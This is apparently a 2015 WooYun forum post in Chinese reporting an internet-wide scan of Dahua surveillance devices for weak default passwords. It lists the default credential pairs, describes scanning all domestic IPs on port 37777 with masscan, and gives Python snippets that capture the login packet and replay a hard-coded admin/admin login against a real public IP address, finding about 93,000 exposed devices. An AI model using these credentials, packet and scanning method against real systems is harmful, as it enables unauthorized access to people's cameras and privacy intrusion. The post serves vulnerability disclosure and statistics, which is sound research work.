大华监控设备弱口令安全问题统计报告(标题要

  • A+
所属分类:WooYun-Zone

北京方便面大华监控设备弱口令安全问题统计报告(标题要 大华监控设备弱口令安全问题统计报告(标题要 | 2015-08-26 19:09

先看这里
大量浙江大华监控设备弱口令漏洞
WooYun: 大量浙江大华监控设备弱口令漏洞
大华监控设备默认是开启HTTP端口80和TCP端口37777

设备默认弱口令
user:admin pass:admin 管理权限
user:default pass:user 用户默认登陆帐号
user:888888 pass:admin
user:666666 pass:user

一、初步筛选出开放37777端口的ip
借用小伙伴的vps扫描了国内全部ip的37777端口,使用masscan半个小时扫描完成,服务器的发包速度能够达到 180kpps吧,最后得到的结果开放37777端口的ip共计60万多(652488)。
二、扫描存在漏洞的ip
得到了开放37777端口的ip列表,我们需要写个脚本去批量扫描获取存在漏洞的ip,想到的方式是利用socket模拟登陆,根据返回包判断是否存在漏洞。
1、抓取正常登陆包
代码片段
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    sock.bind(('192.168.1.90',37777))  
    sock.listen(5)
    while True:  
        connection,address = sock.accept()  
        try:  
            connection.settimeout(5)  
            buf = connection.recv(1024)
            f=open("37777data.txt",'a')
            f.write(buf)
            f.close()

2、socket简单模拟正常登陆并判断返回包
代码片段
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('58.246.234.102',37777))
    time.sleep(2)
    #send_buf = open('37777data.txt', 'rb').read()
    ##print binascii.b2a_hex(send_buf)
    send_buf = ('\xa0\x00\x00\x60\x00\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x04\x01\x00\x00\x00\x00\xa1\xaa')
    sock.send(send_buf)

(数据要binascii.b2a_hex编码一下才好做对比)

脚本写好,同样是放在小伙伴的vps上,妈蛋(´Д`),耗时19个小时,93219个ip。

结果图形化:
大华监控设备弱口令安全问题统计报告(标题要
大华监控设备弱口令安全问题统计报告(标题要
其他:大华监控设备弱口令安全问题统计报告(标题要
大华监控设备弱口令安全问题统计报告(标题要
大华监控设备弱口令安全问题统计报告(标题要
大华监控设备弱口令安全问题统计报告(标题要

分享到: